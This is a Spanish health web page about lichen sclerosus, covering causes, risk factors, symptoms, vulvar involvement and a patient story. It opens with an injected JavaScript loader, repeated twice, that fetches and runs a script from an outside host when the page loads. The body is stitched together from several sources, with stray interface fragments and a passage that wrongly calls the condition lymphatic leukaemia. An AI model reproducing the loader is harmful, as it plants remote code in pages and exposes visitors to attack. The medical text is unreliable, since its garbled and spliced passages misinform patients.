;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Liquen escleroso tratamiento - Informa Salud

Liquen escleroso tratamiento

Liquen plano

El médico puede sugerir un tratamiento con cremas o pomadas que ayuden a devolver a la piel un aspecto más normal y a disminuir la tendencia a la formación de cicatrices. La enfermedad tiende a reaparecer, por lo que puede ser necesario un seguimiento a largo plazo. En raras ocasiones, el liquen escleroso mejora sin tratamiento.Productos y serviciosMostrar más productos de Mayo Clinic

CausasSe desconoce la causa del liquen escleroso. Un sistema inmunitario hiperactivo o un desequilibrio hormonal pueden desempeñar un papel. Un daño cutáneo previo en un lugar concreto de la piel puede aumentar la probabilidad de que aparezca liquen escleroso en ese lugar.

El liquen escleroso suele aparecer en mujeres posmenopáusicas, pero también en hombres y niños. En las mujeres, el liquen escleroso suele afectar a la vulva. En los niños y los hombres, los varones no circuncidados son los que corren más riesgo, ya que la enfermedad suele afectar al prepucio.

Factores de riesgoEl riesgo de padecer liquen escleroso es mayor en las mujeres posmenopáusicas, aunque puede darse en hombres y niños. Los hombres no circuncidados tienen un mayor riesgo porque la afección suele afectar al prepucio.

Patología del liquen escleroso

Skip to Main ContentResumenEs poco probable que haya oído hablar de una enfermedad de la piel llamada liquen escleroso si no la tiene o no está cerca de alguien que la tenga. Esto se debe a que afecta principalmente a los genitales que, por supuesto, suelen estar cubiertos por la ropa.

El liquen escleroso es una enfermedad rara de la piel que provoca manchas de piel fina, blanca y arrugada que pican y duelen. En las mujeres, pueden aparecer en la vulva y/o en la piel que rodea el ano. En los hombres, suele afectar a la cabeza del pene. Y tanto en los hombres como en las mujeres, puede provocar dolor en las relaciones sexuales y dificultades al orinar, entre otros síntomas.

El liquen escleroso es una enfermedad crónica, lo que significa que una vez que se desarrolla, dura mucho tiempo, a menudo el resto de la vida del paciente. Aunque suele empeorar con el tiempo, la buena noticia es que ahora existen tratamientos que pueden reducir los síntomas y detener la progresión de la enfermedad.

«El liquen escleroso puede permanecer sin diagnosticar durante años porque las mujeres suelen tener demasiada vergüenza de contar sus síntomas al médico», dice la Dra. Amanda Zubek, dermatóloga de Yale Medicine. «Cuando se detecta a tiempo, un tratamiento rápido puede evitar toda una vida de picores debilitantes y cicatrices genitales dolorosas». ¿Qué es el liquen escleroso? El liquen escleroso es una enfermedad inflamatoria crónica de la piel que afecta a entre cinco y diez veces más mujeres (con mayor frecuencia en la posmenopausia) que hombres. Sin embargo, puede desarrollarse en personas de cualquier edad, incluidos bebés y niños. «Es relativamente rara; no se conoce su prevalencia exacta, pero se calcula que se da entre 1 de cada 300 y 1 de cada 1.000 individuos», dice el Dr. Zubek. Las lesiones causadas por el liquen escleroso suelen empezar como pequeñas protuberancias rosadas o blanquecinas. Con el tiempo, se vuelven irregulares, arrugadas y blancas, a menudo parecidas al papel de seda. Estas manchas suelen picar y doler. Dado que la piel afectada es delicada, incluso un ligero picor puede provocar hemorragias.

Liquen escleroso vulvar

Los síntomas del liquen escleroso pueden confundirse fácilmente con muchas otras afecciones que afectan a la salud de la vagina y la vulva. Sin embargo, esta afección poco común pero crónica puede tener un impacto duradero en la salud sexual y general de la mujer. El liquen escleroso suele aparecer en mujeres posmenopáusicas de más de 50 años. Sus características manchas blancas y el adelgazamiento de la piel lo diferencian de otras afecciones cutáneas y genitales. Aunque no existe una cura permanente, hay nuevos tratamientos que pueden ofrecer una rápida curación y un alivio duradero de sus dolorosos y a veces debilitantes síntomas.

El liquen escleroso es una afección cutánea crónica y poco frecuente que crea manchas blancas de piel fina que pueden magullarse, desgarrarse y dejar cicatrices con facilidad. Suele aparecer en mujeres posmenopáusicas de más de 50 años y es más probable que afecte a la vulva y el ano, junto con los labios, el clítoris, la zona perineal y la zona perirrectal.  Incluso con tratamiento, puede durar años y causar cicatrices permanentes y otras complicaciones. Algunas personas no presentan síntomas, mientras que otras pueden experimentar picores, molestias, ampollas y, en casos graves, cicatrices que pueden afectar a las funciones corporales.  A pesar de causar molestias o dolor durante las relaciones sexuales, el liquen escleroso vulvar no es contagioso y no puede propagarse a través de las relaciones sexuales.

Geri bildirim

El liquen escleroso (LS) es una enfermedad cutánea de larga duración que afecta principalmente a la piel de los genitales. El liquen escleroso también afecta ocasionalmente a otras zonas del cuerpo, como la parte superior de los brazos, la espalda, los pechos y los hombros. Es más frecuente en mujeres que han pasado por la menopausia, aunque también puede darse en hombres y en niños. La leucemia linfática no es una infección y no puede contagiarse a su pareja ni a nadie más. No está claro cuál es la causa de la leucemia linfática, pero se cree que está relacionada con la hiperactividad del sistema inmunitario. Los antecedentes familiares pueden ser a veces un factor, con casos raros de varias personas afectadas dentro del mismo grupo familiar.

Vivir con liquen escleroso – La historia de ColetteQueremos agradecer a Colette que comparta su experiencia personal sobre su diagnóstico y sobre cómo vivir con esta enfermedad tan íntima y poco conocida.  Al hablar de enfermedades raras como el liquen escleroso, pretendemos aumentar la concienciación y mejorar los índices de diagnóstico, permitiendo que más personas se beneficien de los tratamientos adecuados y de una mejor calidad de vida.Collette comparte su experiencia personal de su historia familiar y de recibir ella misma el diagnóstico de liquen escleroso; así como de tener que lidiar con el tratamiento y la gestión de esta enfermedad, a menudo difícil, de forma continua.Lea la historia completa de Colette aquí.

About the author